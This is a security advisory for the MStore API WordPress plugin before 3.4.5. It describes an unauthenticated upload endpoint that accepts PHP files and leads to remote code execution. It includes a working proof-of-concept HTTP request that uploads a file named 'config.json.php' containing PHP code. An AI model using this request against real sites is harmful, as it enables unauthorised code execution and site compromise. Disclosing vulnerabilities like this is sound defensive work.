MStore API < 3.4.5 – Unauthenticated PHP File Upload

Description

The api/flutter_woo/config_file REST endpoint of the plugin, does not have proper authorisation in place (only checking if the plugin has a license), nor enough validation against the config file sent in the request. As a result, unauthenticated users could use such endpoint to upload a PHP file, leading to RCE

We confirmed that the issue is still present in the latest version (currently 3.4.4). The vendor has been notified on October 5th, 2021

Proof of Concept

The blog should have a license, ie the mstore_purchase_code option should be “1”

POST /wp-json/api/flutter_woo/config_file HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797
X-Requested-With: XMLHttpRequest
Content-Length: 250
Connection: close

-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="file"; filename="config.json.php"
Content-Type: application/json

<?php echo 'Failed'; ?>
-----------------------------3937767834299093780715813797--


File URL of the uploaded file will be in the response, e.g https://example.com/wp-content/uploads/2000/01/config.json.php